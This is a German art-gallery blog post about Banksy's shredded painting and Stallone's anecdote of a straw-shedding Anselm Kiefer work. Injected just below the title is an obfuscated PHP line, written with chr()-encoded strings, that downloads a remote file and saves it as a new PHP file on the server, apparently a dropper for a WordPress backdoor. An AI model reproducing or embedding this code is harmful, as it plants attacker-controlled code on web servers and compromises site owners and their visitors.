/, Commercial, Info/Lebende Bilder – Bilder die leben

Lebende Bilder – Bilder die leben

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Streetart Künstler Banksy baut einen Schredder in den Rahmen, der bei Verkauf das erstandene Bild (Verkaufspreis 1,4 Millionen Pfund), das Bild wird vor aller Augen geschreddert, der Käufer bekommt erst wohl einen Schock, danach wird er ausrechnen, wie hoch die Wertsteigerung seines eben erstandenen Kunstwerkes sein wird und der Schock wird sich in Freude gewandelt haben: Der Preis für das Mädchen mit dem roten Luftballon dürfte nach diesem Medienhype, einem Geniestreich des Streetartkünstlers, um einiges gestiegen sein.

Sylvester Stallone war damals nicht ganz so glücklich mit seinem Anselm Kiefer gewesen sein.

Das Bild war mit Stroh beklebt und vielleicht hatte Kiefer einfach nicht den richtigen Kleber benutzt:

Stallone: Ich habe dafür 1,7 Millionen Dollar bezahlt! Es war Stroh drauf. Kiefer hat das Stroh mit Klebstoff befestigt. Zu Hause denke ich: Scheiße, was liegt da unterm Bild? Stroh. Jeden Tag ein neuer Halm. Ich rufe den Händler an und sage: ,,Der Kiefer haart.” Sagt der Händler: ,,Mister Stallone, das muss so sein, das Bild geht durch eine Entwicklung, das Bild lebt.” Ich dachte, ich werd’ verrückt. 1,7 Millionen Dollar!

SZ: Und dann?

Stallone: Ich hab’ die Halme wieder drangeklebt.

SZ: Nicht wahr.

Stallone: Doch. Jeden Tag lag ein Halm unten, ich hin, Klebstoff, Halm wieder dran. Ich habs’ nicht eingesehen.

SZ: Eine Co-Produktion von Anselm Kiefer und Sylvester Stallone.

Stallone: So ungefähr. Das Bild ist aber verkauft.

SZ: Sie wollten kein Stroh mehr . . .

Stallone: Oh, ich habe das Bild geliebt, ein überwältigendes Bild. Aber eben auch sehr groß. Es ging über eine ganze Wand. Und es war so absolut finster. Meine Frau fand, die Kinder könnten depressiv werden. Ich wünschte später, ich hätte es noch ein paar Jahre behalten. Was eure Maler inzwischen an Wert zugelegt haben!

Kunst oder ein gigantischer Werbegag, wer kann das schon unterscheiden – und geht es bei der Kunst nicht auch immer ein Stück weit darum, Aufmerksamkeit zu erregen?

Schauen Sie sich die Werke in der Galerie Mouzaoui an, wir verraten Ihnen auch nicht in welchem Bild wir den Schredder versteckt haben!

www.art-onlinedealer.com

By | 2018-10-10T07:26:48+02:00 Oktober 10th, 2018|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen